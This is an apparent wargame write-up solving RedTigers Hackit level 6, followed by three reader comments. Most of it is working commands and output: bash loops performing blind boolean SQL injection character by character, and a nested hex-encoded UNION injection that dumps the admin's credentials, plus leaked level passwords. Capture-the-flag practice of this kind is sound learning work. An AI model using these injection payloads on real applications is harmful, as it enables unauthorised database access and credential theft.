# RedTigers Hackit wargame: Level 6


# curl --silent --insecure --cookie-jar level6 --cookie level6 --request POST --data "password=6d795f6361745f736179735f6d656f776d656f77&level6login=Login" https://redtiger.dyndns.org/hackit/level6.php
                <b>Welcome to Level 6</b><br><br>
                Target: Get the first user in table level6_users with status 1<br>
                <br><br><br> <a href="?user=1">Click me</a><br><br><br>
                                <table style="border-collapse:collapse; border:1px solid black;">
                                <tr>
                                        <td>Username: </td>
                                        <td>deddlef</td>
                                </tr>
                                <tr>
                                        <td>Email: </td>
                                        <td>dumbi@damibi.de</td>
                                </tr>
                        </table>

                                        <br>
                        <form method="post">
                                Username: <input type="text" name="user"><br>
                                Password: <input type="text" name="password">
                                <input type="submit" name="login" value="Login">
                        </form>
                        <br>
# for i in `seq 1 30`; do echo $i; result=`curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=0%20or%20if((select%20length(password)%20from%20level6_users%20where%20id=3)=$i,true,false)" | grep deddlef`; if [ "$result" != "" ]; then break; fi; done
1
2
3
4
5
6
7
8
9
10
11
# for i in `seq 1 11`; do for j in `echo {a..z} {0..9}`; do d=` printf "%d\n" \'$j`; result=`curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=0%20or%20if((select%20ord(left(right(password,$[12-$i]),1))%20from%20level6_users%20where%20id=3)=$d,true,false)" | grep deddlef`; if [ "$result" != "" ]; then echo -n "$j"; break; fi; done; done; echo
6d306e737465726b316c6c
# query2="`echo -n "' union select id,username,email,password,status from level6_users where status=1 limit 1 -- " | xxd -p | tr -d '\n'`"
# query1="`echo -n \"0 union select 1,0x$query2,3,4,5\" | sed 's/ /%20/g'`"
# curl --silent --insecure --cookie level6 "https://redtiger.dyndns.org/hackit/level6.php?user=$query1" | grep -A 1 -e ">Username" -e Email
                                        <td>Username: </td>
                                        <td>admin</td>
--
                                        <td>Email: </td>
                                        <td>6d306e737465726b316c6c</td>
# curl --silent --insecure --cookie level6 --request POST --data "user=admin&password=6d306e737465726b316c6c&login=Login" https://redtiger.dyndns.org/hackit/level6.php | grep is:
<br>The password for the next level is: <b>646f6e745f73686f75745f61745f796f75725f6469736b73</b> <br><br>

3 comments:

Anonymous said...

DISABLED like substring , substr, ( , ), mid

So it doesn't work anymore

Chorly said...

I'm not sure of understanding the last query (query1 and query2) and i I have no idea why does it force the password to appear.
Could you give me a little explaination about this?
Thanks :)

Anonymous said...

your solution does not work any more.
how to solve this?